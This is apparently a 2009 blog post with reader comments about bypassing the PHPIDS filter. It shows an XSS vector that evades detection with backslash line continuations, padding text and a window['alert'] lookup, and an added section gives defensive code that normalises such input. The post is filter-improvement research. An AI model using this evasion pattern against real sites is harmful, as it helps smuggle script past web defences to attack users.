PHPIDS bypass

I haven’t hacked the PHPIDS for a while, but David Lindsay (AKA Thornmaker) inspired me. When I say hacked I mean in a good way, because finding bypasses helps improve the filters :)

Here is my vector:

/Please submit the string\
to help us make the \
PHPIDS better./,y=('aler\
t'),x=this,x=x[y]
x('I cant let you have all the fun thornmaker'),/abc abc\
abc abc abc\
abc\
/,/abc abc\
abc abc abc\
abc\
/

Notice the English-like text, included to bypass the Centrifuge detection. I use backslashes to split strings across lines in order to bypass the regular expressions. “this” refers to the current window, and looking up the string “alert” as a property of the window object yields a reference to the alert function. It’s worth noting Mario fixed it very quickly, so it no longer works. If you want a go and want to come up with your own vector, check out the PHPIDS demo page.
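The normalisation step a signature filter needs against this trick, as an added example that is not code from the post or from PHPIDS; the signature list and the sample string are assumed and constructed here:

```javascript
// Added example, not from the post or from PHPIDS: fold JavaScript line
// continuations before running a signature filter, so the filter matches the
// token the engine will actually execute rather than the raw bytes.

// Inside a string literal, a backslash immediately followed by a line terminator
// is an ECMAScript LineContinuation and contributes no characters: the engine
// reads 'aler\<LF>t' as 'alert', while a filter regex run on the raw input never
// sees the word "alert". An escaped backslash ("\\") is consumed as a unit so it
// is not mistaken for the start of a continuation.
function foldLineContinuations(input) {
  return input.replace(/\\\\|\\(?:\r\n|[\n\r\u2028\u2029])/g, (m) =>
    m === "\\\\" ? m : ""
  );
}

// Assumed, illustrative signature (not a PHPIDS rule): the sink the post's
// vector reaches once the continuation is removed.
const SIGNATURES = [/\balert\b/i];

// Report which signatures fire on the raw input and which fire after folding;
// the difference is exactly what the continuation trick hides from a filter.
function scan(input) {
  const folded = foldLineContinuations(input);
  return {
    raw: SIGNATURES.filter((re) => re.test(input)).map(String),
    folded: SIGNATURES.filter((re) => re.test(folded)).map(String),
    normalised: folded,
  };
}

// Constructed sample: the core of the post's vector, with "alert" split across
// two lines by a backslash-newline exactly as the post does.
const SAMPLE = "y=('aler\\\nt'),x=this,x=x[y]";

console.log(scan(SAMPLE));
// raw: [] (the filter misses it); folded: ["/\\balert\\b/i"] (the filter hits)
```

Folding is only one normalisation; the `this[y]` indirection in the vector still needs a heuristic such as Centrifuge rather than a plain keyword match.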

Comments 3

  1. thornmaker wrote:

    backslashes with multilines… nice! I was actually just thinking about that the other night, but in a different context - never occurred to me to try it in a bypass :)

    Posted 05 Jan 2009 at 3:23 am
  2. Gareth Heyes wrote:

    I was also thinking cdata could be another way of doing it :)

    Posted 05 Jan 2009 at 9:43 am
  3. Gareth Heyes wrote:

    CData doesn’t split strings nicely :( or reg exps. Just tested it now. There must be another way though

    Posted 05 Jan 2009 at 10:19 am
